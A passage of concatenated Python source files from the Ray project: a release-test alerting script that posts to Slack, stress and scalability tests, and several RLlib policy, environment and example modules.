from alerts.long_running_tests import handle_result as \
long_running_tests_handle_result
from alerts.tune_tests import handle_result as tune_tests_handle_result
from alerts.xgboost_tests import handle_result as xgboost_tests_handle_result
SUITE_TO_FN = {
"long_running_tests": long_running_tests_handle_result,
"rllib_tests": rllib_tests_handle_result,
"tune_tests": tune_tests_handle_result,
"xgboost_tests": xgboost_tests_handle_result,
}
GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"] = "alert_state"
GLOBAL_CONFIG["SLACK_WEBHOOK"] = os.environ.get("SLACK_WEBHOOK", "")
GLOBAL_CONFIG["SLACK_CHANNEL"] = os.environ.get("SLACK_CHANNEL",
"#oss-test-cop")
RESULTS_LIMIT = 120
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def maybe_fetch_slack_webhook():
if GLOBAL_CONFIG["SLACK_WEBHOOK"] in [None, ""]:
print("Missing SLACK_WEBHOOK, retrieving from AWS secrets store")
GLOBAL_CONFIG["SLACK_WEBHOOK"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"release-automation/"
"slack-webhook-Na0CFP")["SecretString"]
def _obj_hash(obj: Any) -> str:
json_str = json.dumps(obj, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def fetch_latest_alerts(rds_data_client):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"]
sql = (f"""
SELECT DISTINCT ON (category, test_suite, test_name)
category, test_suite, test_name, last_result_hash,
last_notification_dt
FROM {schema}
ORDER BY category, test_suite, test_name, last_notification_dt DESC
LIMIT {RESULTS_LIMIT}
""")
result = rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
for row in result["records"]:
category, test_suite, test_name, last_result_hash, \
last_notification_dt = (
r["stringValue"]
if "stringValue" in r else None
for r in row
)
last_notification_dt = datetime.datetime.strptime(
last_notification_dt, "%Y-%m-%d %H:%M:%S")
yield category, test_suite, test_name, last_result_hash, \
last_notification_dt
def fetch_latest_results(rds_data_client,
fetch_since: Optional[datetime.datetime] = None):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]
sql = (f"""
SELECT DISTINCT ON (category, test_suite, test_name)
created_on, category, test_suite, test_name, status, results,
artifacts, last_logs
FROM {schema} """)
parameters = []
if fetch_since is not None:
sql += "WHERE created_on >= :created_on "
parameters = [
{
"name": "created_on",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": fetch_since.strftime("%Y-%m-%d %H:%M:%S")
},
},
]
sql += "ORDER BY category, test_suite, test_name, created_on DESC "
sql += f"LIMIT {RESULTS_LIMIT}"
result = rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
parameters=parameters,
)
for row in result["records"]:
created_on, category, test_suite, test_name, status, results, \
artifacts, last_logs = (
r["stringValue"] if "stringValue" in r else None for r in row)
# Calculate hash before converting strings to objects
result_obj = (created_on, category, test_suite, test_name, status,
results, artifacts, last_logs)
result_json = json.dumps(result_obj)
result_hash = _obj_hash(result_json)
# Convert some strings to python objects
created_on = datetime.datetime.strptime(created_on,
"%Y-%m-%d %H:%M:%S")
results = json.loads(results)
artifacts = json.loads(artifacts)
yield result_hash, created_on, category, test_suite, test_name, \
status, results, artifacts, last_logs
def mark_as_handled(rds_data_client, update: bool, category: str,
test_suite: str, test_name: str, result_hash: str,
last_notification_dt: datetime.datetime):
schema = GLOBAL_CONFIG["RELEASE_AWS_DB_STATE_TABLE"]
if not update:
sql = (f"""
INSERT INTO {schema}
(category, test_suite, test_name,
last_result_hash, last_notification_dt)
VALUES (:category, :test_suite, :test_name,
:last_result_hash, :last_notification_dt)
""")
else:
sql = (f"""
UPDATE {schema}
SET last_result_hash=:last_result_hash,
last_notification_dt=:last_notification_dt
WHERE category=:category AND test_suite=:test_suite
AND test_name=:test_name
""")
rds_data_client.execute_statement(
database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
parameters=[
{
"name": "category",
"value": {
"stringValue": category
}
},
{
"name": "test_suite",
"value": {
"stringValue": test_suite or ""
}
},
{
"name": "test_name",
"value": {
"stringValue": test_name
}
},
{
"name": "last_result_hash",
"value": {
"stringValue": result_hash
}
},
{
"name": "last_notification_dt",
"typeHint": "TIMESTAMP",
"value": {
"stringValue": last_notification_dt.strftime(
"%Y-%m-%d %H:%M:%S")
},
},
],
secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
schema=schema,
sql=sql,
)
def post_alerts_to_slack(channel: str, alerts: List[Tuple[str, str, str, str]],
non_alerts: Mapping[str, int]):
if len(alerts) == 0:
logger.info("No alerts to post to slack.")
return
markdown_lines = [
f"* {len(alerts)} new release test failures found!*",
"",
]
category_alerts = defaultdict(list)
for (category, test_suite, test_name, alert) in alerts:
category_alerts[category].append(
f" *{test_suite}/{test_name}* failed: {alert}")
for category, alert_list in category_alerts.items():
markdown_lines.append(f"Branch: *{category}*")
markdown_lines.extend(alert_list)
markdown_lines.append("")
total_non_alerts = sum(n for n in non_alerts.values())
non_alert_detail = [f"{n} on {c}" for c, n in non_alerts.items()]
markdown_lines += [
f"Additionally, {total_non_alerts} tests passed successfully "
f"({', '.join(non_alert_detail)})."
]
slack_url = GLOBAL_CONFIG["SLACK_WEBHOOK"]
resp = requests.post(
slack_url,
json={
"text": "\n".join(markdown_lines),
"channel": channel,
"username": "Fail Bot",
"icon_emoji": ":red_circle:",
},
)
print(resp.status_code)
print(resp.text)
def post_statistics_to_slack(channel: str,
alerts: List[Tuple[str, str, str, str]],
non_alerts: Mapping[str, int]):
total_alerts = len(alerts)
category_alerts = defaultdict(list)
for (category, test_suite, test_name, alert) in alerts:
category_alerts[category].append(f"`{test_suite}/{test_name}`")
alert_detail = [f"{len(a)} on {c}" for c, a in category_alerts.items()]
total_non_alerts = sum(n for n in non_alerts.values())
non_alert_detail = [f"{n} on {c}" for c, n in non_alerts.items()]
markdown_lines = [
"*Periodic release test report*", "", f"In the past 24 hours, "
f"*{total_non_alerts}* release tests finished successfully, and "
f"*{total_alerts}* release tests failed."
]
markdown_lines.append("")
if total_alerts:
markdown_lines.append(f"*Failing:* {', '.join(alert_detail)}")
for c, a in category_alerts.items():
markdown_lines.append(f" *{c}*: {', '.join(sorted(a))}")
else:
markdown_lines.append("*Failing:* None")
markdown_lines.append("")
if total_non_alerts:
markdown_lines.append(f"*Passing:* {', '.join(non_alert_detail)}")
else:
markdown_lines.append("*Passing:* None")
slack_url = GLOBAL_CONFIG["SLACK_WEBHOOK"]
resp = requests.post(
slack_url,
json={
"text": "\n".join(markdown_lines),
"channel": channel,
"username": "Fail Bot",
"icon_emoji": ":red_circle:",
},
)
print(resp.status_code)
print(resp.text)
def handle_results_and_get_alerts(
rds_data_client,
fetch_since: Optional[datetime.datetime] = None,
always_try_alert: bool = False,
no_status_update: bool = False):
# First build a map of last notifications
last_notifications_map = {}
for category, test_suite, test_name, last_result_hash, \
last_notification_dt in fetch_latest_alerts(rds_data_client):
last_notifications_map[(category, test_suite,
test_name)] = (last_result_hash,
last_notification_dt)
alerts = []
non_alerts = Counter()
# Then fetch latest results
for result_hash, created_on, category, test_suite, test_name, status, \
results, artifacts, last_logs in fetch_latest_results(
rds_data_client, fetch_since=fetch_since):
key = (category, test_suite, test_name)
try_alert = always_try_alert
if key in last_notifications_map:
# If we have an alert for this key, fetch info
last_result_hash, last_notification_dt = last_notifications_map[
key]
if last_result_hash != result_hash:
# If we got a new result, handle new result
try_alert = True
# Todo: maybe alert again after some time?
else:
try_alert = True
if try_alert:
handle_fn = SUITE_TO_FN.get(test_suite, None)
if not handle_fn:
logger.warning(f"No handle for suite {test_suite}")
alert = default_handle_result(created_on, category, test_suite,
test_name, status, results,
artifacts, last_logs)
else:
alert = handle_fn(created_on, category, test_suite, test_name,
status, results, artifacts, last_logs)
if alert:
logger.warning(
f"Alert raised for test {test_suite}/{test_name} "
f"({category}): {alert}")
alerts.append((category, test_suite, test_name, alert))
else:
logger.debug(
f"No alert raised for test {test_suite}/{test_name} "
f"({category})")
non_alerts[category] += 1
if not no_status_update:
mark_as_handled(rds_data_client, key in last_notifications_map,
category, test_suite, test_name, result_hash,
datetime.datetime.now())
return alerts, non_alerts
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--stats",
action="store_true",
default=False,
help="Finish quickly for training.")
args = parser.parse_args()
maybe_fetch_slack_webhook()
rds_data_client = boto3.client("rds-data", region_name="us-west-2")
if args.stats:
# Only update last 24 hour stats
fetch_since = datetime.datetime.now() - datetime.timedelta(days=1)
alerts, non_alerts = handle_results_and_get_alerts(
rds_data_client,
fetch_since=fetch_since,
always_try_alert=True,
no_status_update=True)
post_statistics_to_slack(GLOBAL_CONFIG["SLACK_CHANNEL"], alerts,
non_alerts)
else:
alerts, non_alerts = handle_results_and_get_alerts(rds_data_client)
post_alerts_to_slack(GLOBAL_CONFIG["SLACK_CHANNEL"], alerts,
non_alerts)
```
#### File: stress_tests/workloads/test_placement_group.py
```python
import time
from time import perf_counter
from random import random
import ray
from ray.cluster_utils import Cluster
from ray.util.placement_group import (placement_group, remove_placement_group)
# TODO(sang): Increase the number in the actual stress test.
# This number should be divisible by 3.
resource_quantity = 666
num_nodes = 5
custom_resources = {"pg_custom": resource_quantity}
# Create pg that uses 1 resource of cpu & custom resource.
num_pg = resource_quantity
# TODO(sang): Cluster setup. Remove when running in real clusters.
cluster = Cluster()
nodes = []
for _ in range(num_nodes):
nodes.append(
cluster.add_node(
num_cpus=3, num_gpus=resource_quantity,
resources=custom_resources))
cluster.wait_for_nodes()
ray.init(address=cluster.address)
while not ray.is_initialized():
time.sleep(0.1)
# Scenario 1: Create bunch of placement groups and measure how long it takes.
total_creating_time = 0
total_removing_time = 0
repeat = 1
total_trial = repeat * num_pg
bundles = [{"GPU": 1, "pg_custom": 1}] * num_nodes
# Create and remove placement groups.
for _ in range(repeat):
pgs = []
for i in range(num_pg):
start = perf_counter()
pgs.append(placement_group(bundles, strategy="PACK"))
end = perf_counter()
total_creating_time += (end - start)
ray.get([pg.ready() for pg in pgs])
for pg in pgs:
start = perf_counter()
remove_placement_group(pg)
end = perf_counter()
total_removing_time += (end - start)
# Validate the correctness.
assert ray.cluster_resources()["GPU"] == num_nodes * resource_quantity
assert ray.cluster_resources()["pg_custom"] == num_nodes * resource_quantity
# Scenario 2:
# - Launch 30% of placement group in the driver and pass them.
# - Launch 70% of placement group at each remote tasks.
# - Randomly remove placement groups and schedule tasks and actors.
#
# Goal:
# - Make sure jobs are done without breaking GCS server.
# - Make sure all the resources are recovered after the job is done.
# - Measure the creation latency in the stressful environment.
@ray.remote(num_cpus=0, num_gpus=1, max_calls=0)
def mock_task():
time.sleep(0.1)
return True
@ray.remote(num_cpus=0, num_gpus=1, max_restarts=0)
class MockActor:
def __init__(self):
pass
def ping(self):
pass
@ray.remote(num_cpus=0)
def pg_launcher(pre_created_pgs, num_pgs_to_create):
pgs = []
pgs += pre_created_pgs
for i in range(num_pgs_to_create):
pgs.append(placement_group(bundles, strategy="STRICT_SPREAD"))
pgs_removed = []
pgs_unremoved = []
# Randomly choose placement groups to remove.
for pg in pgs:
if random() < .5:
pgs_removed.append(pg)
else:
pgs_unremoved.append(pg)
tasks = []
max_actor_cnt = 5
actor_cnt = 0
actors = []
# Randomly schedule tasks or actors on placement groups that
# are not removed.
for pg in pgs_unremoved:
# TODO(sang): Comment in this line causes GCS actor management
# failure. We need to fix it.
if random() < .5:
tasks.append(mock_task.options(placement_group=pg).remote())
else:
if actor_cnt < max_actor_cnt:
actors.append(MockActor.options(placement_group=pg).remote())
actor_cnt += 1
# Remove the rest of placement groups.
for pg in pgs_removed:
remove_placement_group(pg)
ray.get([pg.ready() for pg in pgs_unremoved])
ray.get(tasks)
ray.get([actor.ping.remote() for actor in actors])
# Since placement groups are scheduled, remove them.
for pg in pgs_unremoved:
remove_placement_group(pg)
pre_created_num_pgs = round(num_pg * 0.3)
num_pgs_to_create = num_pg - pre_created_num_pgs
pg_launchers = []
for i in range(3):
pre_created_pgs = [
placement_group(bundles, strategy="STRICT_SPREAD")
for _ in range(pre_created_num_pgs // 3)
]
pg_launchers.append(
pg_launcher.remote(pre_created_pgs, num_pgs_to_create // 3))
ray.get(pg_launchers)
assert ray.cluster_resources()["GPU"] == num_nodes * resource_quantity
assert ray.cluster_resources()["pg_custom"] == num_nodes * resource_quantity
ray.shutdown()
print("Avg placement group creating time: "
f"{total_creating_time / total_trial * 1000} ms")
print("Avg placement group removing time: "
f"{total_removing_time / total_trial* 1000} ms")
print("Stress Test succeed.")
```
#### File: scalability_tests/workloads/test_durable_trainable.py
```python
import argparse
import os
import ray
from ray import tune
from ray.tune.utils.release_test_util import timed_tune_run
def main(bucket):
secrets_file = os.path.join(
os.path.dirname(__file__), "..", "aws_secrets.txt")
if os.path.isfile(secrets_file):
print(f"Loading AWS secrets from file {secrets_file}")
from configparser import ConfigParser
config = ConfigParser()
config.read(secrets_file)
for k, v in config.items():
for x, y in v.items():
var = str(x).upper()
os.environ[var] = str(y)
else:
print("No AWS secrets file found. Loading from boto.")
from boto3 import Session
session = Session()
credentials = session.get_credentials()
current_credentials = credentials.get_frozen_credentials()
os.environ["AWS_ACCESS_KEY_ID"] = current_credentials.access_key
os.environ["AWS_SECRET_ACCESS_KEY"] = current_credentials.secret_key
os.environ["AWS_SESSION_TOKEN"] = current_credentials.token
if all(
os.getenv(k, "") for k in [
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY",
"AWS_SESSION_TOKEN",
]):
print("AWS secrets found in env.")
else:
print("Warning: No AWS secrets found in env!")
ray.init(address="auto")
num_samples = 16
results_per_second = 10 / 60
trial_length_s = 300
max_runtime = 500
timed_tune_run(
name="durable trainable",
num_samples=num_samples,
results_per_second=results_per_second,
trial_length_s=trial_length_s,
max_runtime=max_runtime,
checkpoint_freq_s=10, # Once every 10 seconds
checkpoint_size_b=int(10 * 1000**2), # 10 MB
keep_checkpoints_num=2,
resources_per_trial={"cpu": 2},
sync_config=tune.SyncConfig(
sync_to_driver=False,
upload_dir=f"s3://{bucket}/durable/",
))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--bucket", type=str, help="Bucket name")
args, _ = parser.parse_known_args()
main(args.bucket or "ray-tune-scalability-test")
```
#### File: agents/mbmpo/mbmpo_torch_policy.py
```python
import gym
from gym.spaces import Box, Discrete
import logging
from typing import Tuple, Type
import ray
from ray.rllib.agents.maml.maml_torch_policy import setup_mixins, \
maml_loss, maml_stats, maml_optimizer_fn, KLCoeffMixin
from ray.rllib.agents.ppo.ppo_tf_policy import setup_config
from ray.rllib.agents.ppo.ppo_torch_policy import vf_preds_fetches
from ray.rllib.evaluation.postprocessing import compute_gae_for_sample_batch
from ray.rllib.models.catalog import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.torch.torch_action_dist import TorchDistributionWrapper
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.policy_template import build_policy_class
from ray.rllib.utils.error import UnsupportedSpaceException
from ray.rllib.utils.framework import try_import_torch
from ray.rllib.utils.torch_ops import apply_grad_clipping
from ray.rllib.utils.typing import TrainerConfigDict
torch, nn = try_import_torch()
logger = logging.getLogger(__name__)
def validate_spaces(policy: Policy, observation_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: TrainerConfigDict) -> None:
"""Validates the observation- and action spaces used for the Policy.
Args:
policy (Policy): The policy, whose spaces are being validated.
observation_space (gym.spaces.Space): The observation space to
validate.
action_space (gym.spaces.Space): The action space to validate.
config (TrainerConfigDict): The Policy's config dict.
Raises:
UnsupportedSpaceException: If one of the spaces is not supported.
"""
# Only support single Box or single Discrete spaces.
if not isinstance(action_space, (Box, Discrete)):
raise UnsupportedSpaceException(
"Action space ({}) of {} is not supported for "
"MB-MPO. Must be [Box|Discrete].".format(action_space, policy))
# If Box, make sure it's a 1D vector space.
elif isinstance(action_space, Box) and len(action_space.shape) > 1:
raise UnsupportedSpaceException(
"Action space ({}) of {} has multiple dimensions "
"{}. ".format(action_space, policy, action_space.shape) +
"Consider reshaping this into a single dimension Box space "
"or using the multi-agent API.")
def make_model_and_action_dist(
policy: Policy,
obs_space: gym.spaces.Space,
action_space: gym.spaces.Space,
config: TrainerConfigDict) -> \
Tuple[ModelV2, Type[TorchDistributionWrapper]]:
"""Constructs the necessary ModelV2 and action dist class for the Policy.
Args:
policy (Policy): The TFPolicy that will use the models.
obs_space (gym.spaces.Space): The observation space.
action_space (gym.spaces.Space): The action space.
config (TrainerConfigDict): The SAC trainer's config dict.
Returns:
ModelV2: The ModelV2 to be used by the Policy. Note: An additional
target model will be created in this function and assigned to
`policy.target_model`.
"""
# Get the output distribution class for predicting rewards and next-obs.
policy.distr_cls_next_obs, num_outputs = ModelCatalog.get_action_dist(
obs_space, config, dist_type="deterministic", framework="torch")
# Build one dynamics model if we are a Worker.
# If we are the main MAML learner, build n (num_workers) dynamics Models
# for being able to create checkpoints for the current state of training.
device = (torch.device("cuda")
if torch.cuda.is_available() else torch.device("cpu"))
policy.dynamics_model = ModelCatalog.get_model_v2(
obs_space,
action_space,
num_outputs=num_outputs,
model_config=config["dynamics_model"],
framework="torch",
name="dynamics_ensemble",
).to(device)
action_dist, num_outputs = ModelCatalog.get_action_dist(
action_space, config, framework="torch")
# Create the pi-model and register it with the Policy.
policy.pi = ModelCatalog.get_model_v2(
obs_space,
action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
name="policy_model",
)
return policy.pi, action_dist
# Build a child class of `TorchPolicy`, given the custom functions defined
# above.
MBMPOTorchPolicy = build_policy_class(
name="MBMPOTorchPolicy",
framework="torch",
get_default_config=lambda: ray.rllib.agents.mbmpo.mbmpo.DEFAULT_CONFIG,
make_model_and_action_dist=make_model_and_action_dist,
loss_fn=maml_loss,
stats_fn=maml_stats,
optimizer_fn=maml_optimizer_fn,
extra_action_out_fn=vf_preds_fetches,
postprocess_fn=compute_gae_for_sample_batch,
extra_grad_process_fn=apply_grad_clipping,
before_init=setup_config,
after_init=setup_mixins,
mixins=[KLCoeffMixin])
```
#### File: env/apis/task_settable_env.py
```python
import gym
from typing import List, Any
TaskType = Any # Can be different types depending on env, e.g., int or dict
class TaskSettableEnv(gym.Env):
"""
Extension of gym.Env to define a task-settable Env.
Your env must implement this interface in order to be used with MAML.
For curriculum learning, you can add this API to your env such that
the `env_task_fn` can set the next task as needed.
Supports:
- Sampling from a distribution of tasks for meta-learning.
- Setting the env to any task it supports.
- Getting the current task this env has been set to.
Examples:
>>> env = TaskSettableEnv(...)
>>> ...
>>> Trainer.workers.foreach_env(lambda base_env: base_env.my_prop)
"""
def sample_tasks(self, n_tasks: int) -> List[TaskType]:
"""Samples task of the meta-environment
Args:
n_tasks (int) : number of different meta-tasks needed
Returns:
tasks (list) : an (n_tasks) length list of tasks
"""
raise NotImplementedError
def set_task(self, task: TaskType) -> None:
"""Sets the specified task to the current environment
Args:
task: task of the meta-learning environment
"""
raise NotImplementedError
def get_task(self) -> TaskType:
"""Gets the task that the agent is performing in the current environment
Returns:
task: task of the meta-learning environment
"""
raise NotImplementedError
```
#### File: env/wrappers/kaggle_wrapper.py
```python
from copy import deepcopy
from typing import Any, Dict, Optional, Tuple
try:
import kaggle_environments
except (ImportError, ModuleNotFoundError):
pass
import numpy as np
from gym.spaces import Box
from gym.spaces import Dict as DictSpace
from gym.spaces import Discrete, MultiBinary, MultiDiscrete, Space
from gym.spaces import Tuple as TupleSpace
from ray.rllib.env import MultiAgentEnv
from ray.rllib.utils.typing import MultiAgentDict, AgentID
class KaggleFootballMultiAgentEnv(MultiAgentEnv):
"""An interface to the kaggle's football environment.
See: https://github.com/Kaggle/kaggle-environments
"""
def __init__(self, configuration: Optional[Dict[str, Any]] = None) -> None:
"""Initializes a Kaggle football environment.
Args:
configuration (Optional[Dict[str, Any]]): configuration of the
football environment. For detailed information, see:
https://github.com/Kaggle/kaggle-environments/blob/master/kaggle_environments/envs/football/football.json
"""
self.kaggle_env = kaggle_environments.make(
"football", configuration=configuration or {})
self.last_cumulative_reward = None
def reset(self) -> MultiAgentDict:
kaggle_state = self.kaggle_env.reset()
self.last_cumulative_reward = None
return {
f"agent{idx}": self._convert_obs(agent_state["observation"])
for idx, agent_state in enumerate(kaggle_state)
if agent_state["status"] == "ACTIVE"
}
def step(
self, action_dict: Dict[AgentID, int]
) -> Tuple[MultiAgentDict, MultiAgentDict, MultiAgentDict, MultiAgentDict]:
# Convert action_dict (used by RLlib) to a list of actions (used by
# kaggle_environments)
action_list = [None] * len(self.kaggle_env.state)
for idx, agent_state in enumerate(self.kaggle_env.state):
if agent_state["status"] == "ACTIVE":
action = action_dict[f"agent{idx}"]
action_list[idx] = [action]
self.kaggle_env.step(action_list)
# Parse (obs, reward, done, info) from kaggle's "state" representation
obs = {}
cumulative_reward = {}
done = {"__all__": self.kaggle_env.done}
info = {}
for idx in range(len(self.kaggle_env.state)):
agent_state = self.kaggle_env.state[idx]
agent_name = f"agent{idx}"
if agent_state["status"] == "ACTIVE":
obs[agent_name] = self._convert_obs(agent_state["observation"])
cumulative_reward[agent_name] = agent_state["reward"]
done[agent_name] = agent_state["status"] != "ACTIVE"
info[agent_name] = agent_state["info"]
# Compute the step rewards from the cumulative rewards
if self.last_cumulative_reward is not None:
reward = {
agent_id: agent_reward - self.last_cumulative_reward[agent_id]
for agent_id, agent_reward in cumulative_reward.items()
}
else:
reward = cumulative_reward
self.last_cumulative_reward = cumulative_reward
return obs, reward, done, info
def _convert_obs(self, obs: Dict[str, Any]) -> Dict[str, Any]:
"""Convert raw observations
These conversions are necessary to make the observations fall into the
observation space defined below.
"""
new_obs = deepcopy(obs)
if new_obs["players_raw"][0]["ball_owned_team"] == -1:
new_obs["players_raw"][0]["ball_owned_team"] = 2
if new_obs["players_raw"][0]["ball_owned_player"] == -1:
new_obs["players_raw"][0]["ball_owned_player"] = 11
new_obs["players_raw"][0]["steps_left"] = [
new_obs["players_raw"][0]["steps_left"]
]
return new_obs
def build_agent_spaces(self) -> Tuple[Space, Space]:
"""Construct the action and observation spaces
Description of actions and observations:
https://github.com/google-research/football/blob/master/gfootball/doc/observation.md
""" # noqa: E501
action_space = Discrete(19)
# The football field's corners are [+-1., +-0.42]. However, the players
# and balls may get out of the field. Thus we multiply those limits by
# a factor of 2.
xlim = 1. * 2
ylim = 0.42 * 2
num_players: int = 11
xy_space = Box(
np.array([-xlim, -ylim], dtype=np.float32),
np.array([xlim, ylim], dtype=np.float32))
xyz_space = Box(
np.array([-xlim, -ylim, 0], dtype=np.float32),
np.array([xlim, ylim, np.inf], dtype=np.float32))
observation_space = DictSpace({
"controlled_players": Discrete(2),
"players_raw": TupleSpace([
DictSpace({
# ball information
"ball": xyz_space,
"ball_direction": Box(-np.inf, np.inf, (3, )),
"ball_rotation": Box(-np.inf, np.inf, (3, )),
"ball_owned_team": Discrete(3),
"ball_owned_player": Discrete(num_players + 1),
# left team
"left_team": TupleSpace([xy_space] * num_players),
"left_team_direction": TupleSpace(
[xy_space] * num_players),
"left_team_tired_factor": Box(0., 1., (num_players, )),
"left_team_yellow_card": MultiBinary(num_players),
"left_team_active": MultiBinary(num_players),
"left_team_roles": MultiDiscrete([10] * num_players),
# right team
"right_team": TupleSpace([xy_space] * num_players),
"right_team_direction": TupleSpace(
[xy_space] * num_players),
"right_team_tired_factor": Box(0., 1., (num_players, )),
"right_team_yellow_card": MultiBinary(num_players),
"right_team_active": MultiBinary(num_players),
"right_team_roles": MultiDiscrete([10] * num_players),
# controlled player information
"active": Discrete(num_players),
"designated": Discrete(num_players),
"sticky_actions": MultiBinary(10),
# match state
"score": Box(-np.inf, np.inf, (2, )),
"steps_left": Box(0, np.inf, (1, )),
"game_mode": Discrete(7)
})
])
})
return action_space, observation_space
```
#### File: rllib/examples/centralized_critic_2.py
```python
import numpy as np
from gym.spaces import Dict, Discrete
import argparse
import os
from ray import tune
from ray.rllib.agents.callbacks import DefaultCallbacks
from ray.rllib.examples.models.centralized_critic_models import \
YetAnotherCentralizedCriticModel, YetAnotherTorchCentralizedCriticModel
from ray.rllib.examples.env.two_step_game import TwoStepGame
from ray.rllib.models import ModelCatalog
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.test_utils import check_learning_achieved
parser = argparse.ArgumentParser()
parser.add_argument(
"--framework",
choices=["tf", "tf2", "tfe", "torch"],
default="tf",
help="The DL framework specifier.")
parser.add_argument(
"--as-test",
action="store_true",
help="Whether this script should be run as a test: --stop-reward must "
"be achieved within --stop-timesteps AND --stop-iters.")
parser.add_argument(
"--stop-iters",
type=int,
default=100,
help="Number of iterations to train.")
parser.add_argument(
"--stop-timesteps",
type=int,
default=100000,
help="Number of timesteps to train.")
parser.add_argument(
"--stop-reward",
type=float,
default=7.99,
help="Reward at which we stop training.")
class FillInActions(DefaultCallbacks):
"""Fills in the opponent actions info in the training batches."""
def on_postprocess_trajectory(self, worker, episode, agent_id, policy_id,
policies, postprocessed_batch,
original_batches, **kwargs):
to_update = postprocessed_batch[SampleBatch.CUR_OBS]
other_id = 1 if agent_id == 0 else 0
action_encoder = ModelCatalog.get_preprocessor_for_space(Discrete(2))
# set the opponent actions into the observation
_, opponent_batch = original_batches[other_id]
opponent_actions = np.array([
action_encoder.transform(a)
for a in opponent_batch[SampleBatch.ACTIONS]
])
to_update[:, -2:] = opponent_actions
def central_critic_observer(agent_obs, **kw):
"""Rewrites the agent obs to include opponent data for training."""
new_obs = {
0: {
"own_obs": agent_obs[0],
"opponent_obs": agent_obs[1],
"opponent_action": 0, # filled in by FillInActions
},
1: {
"own_obs": agent_obs[1],
"opponent_obs": agent_obs[0],
"opponent_action": 0, # filled in by FillInActions
},
}
return new_obs
if __name__ == "__main__":
args = parser.parse_args()
ModelCatalog.register_custom_model(
"cc_model", YetAnotherTorchCentralizedCriticModel
if args.framework == "torch" else YetAnotherCentralizedCriticModel)
action_space = Discrete(2)
observer_space = Dict({
"own_obs": Discrete(6),
# These two fields are filled in by the CentralCriticObserver, and are
# not used for inference, only for training.
"opponent_obs": Discrete(6),
"opponent_action": Discrete(2),
})
config = {
"env": TwoStepGame,
"batch_mode": "complete_episodes",
"callbacks": FillInActions,
# Use GPUs iff `RLLIB_NUM_GPUS` env var set to > 0.
"num_gpus": int(os.environ.get("RLLIB_NUM_GPUS", "0")),
"num_workers": 0,
"multiagent": {
"policies": {
"pol1": (None, observer_space, action_space, {}),
"pol2": (None, observer_space, action_space, {}),
},
"policy_mapping_fn": (
lambda aid, **kwargs: "pol1" if aid == 0 else "pol2"),
"observation_fn": central_critic_observer,
},
"model": {
"custom_model": "cc_model",
},
"framework": args.framework,
}
stop = {
"training_iteration": args.stop_iters,
"timesteps_total": args.stop_timesteps,
"episode_reward_mean": args.stop_reward,
}
results = tune.run("PPO", config=config, stop=stop, verbose=1)
if args.as_test:
check_learning_achieved(results, args.stop_reward)
```
#### File: examples/env/transformed_action_space_env.py
```python
import gym
from ray.rllib.utils.annotations import override
class ActionTransform(gym.ActionWrapper):
def __init__(self, env, low, high):
super().__init__(env)
self._low = low
self._high = high
self.action_space = type(env.action_space)(self._low, self._high,
env.action_space.shape,
env.action_space.dtype)
def action(self, action):
return (action - self._low) / (self._high - self._low) * (
self.env.action_space.high -
self.env.action_space.low) + self.env.action_space.low
def transform_action_space(env_name_or_creator):
"""Wrapper for gym.Envs to have their action space transformed.
Args:
env_name_or_creator (Union[str, Callable[]]: String specifier or
env_maker function.
Returns:
Type[TransformedActionSpaceEnv]: New TransformedActionSpaceEnv class
to be used as env. The constructor takes a config dict with `_low`
and `_high` keys specifying the new action range
(default -1.0 to 1.0). The reset of the config dict will be
passed on to the underlying env's constructor.
Examples:
>>> # By gym string:
>>> pendulum_300_to_500_cls = transform_action_space("Pendulum-v0")
>>> # Create a transformed pendulum env.
>>> pendulum_300_to_500 = pendulum_300_to_500_cls({"_low": -15.0})
>>> pendulum_300_to_500.action_space
... gym.spaces.Box(-15.0, 1.0, (1, ), "float32")
"""
class TransformedActionSpaceEnv(gym.Env):
"""PendulumEnv w/ an action space of range 300.0 to 500.0."""
def __init__(self, config):
self._low = config.pop("low", -1.0)
self._high = config.pop("high", 1.0)
if isinstance(env_name_or_creator, str):
self.env = gym.make(env_name_or_creator)
else:
self.env = env_name_or_creator(config)
self.env = ActionTransform(self.env, self._low, self._high)
self.observation_space = self.env.observation_space
self.action_space = self.env.action_space
@override(gym.Env)
def reset(self):
return self.env.reset()
@override(gym.Env)
def step(self, actions):
return self.env.step(actions)
@override(gym.Env)
def render(self, mode=None):
return self.env.render(mode)
return TransformedActionSpaceEnv
TransformedActionPendulum = transform_action_space("Pendulum-v0")
```
#### File: examples/export/cartpole_dqn_export.py
```python
import os
import ray
from ray.rllib.agents.registry import get_trainer_class
from ray.rllib.utils.framework import try_import_tf
